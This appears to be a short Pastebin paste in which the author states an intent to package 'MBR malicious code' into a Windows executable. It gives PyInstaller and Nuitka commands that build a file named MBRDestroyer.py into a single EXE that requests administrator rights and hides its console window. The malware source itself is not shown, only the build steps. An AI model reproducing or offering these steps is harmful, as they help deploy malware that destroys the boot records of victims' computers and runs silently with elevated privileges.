Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- To build a Python file to EXE (this exe file must be run with admin rights) I will use Pyinstaller or Nuitka to build software containing MBR malicious code:
- pyinstaller --onefile --uac-admin -w MBRDestroyer.py
- nuitka --onefile --windows-uac-admin --mingw64 --disable-console MBRDestroyer.py
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement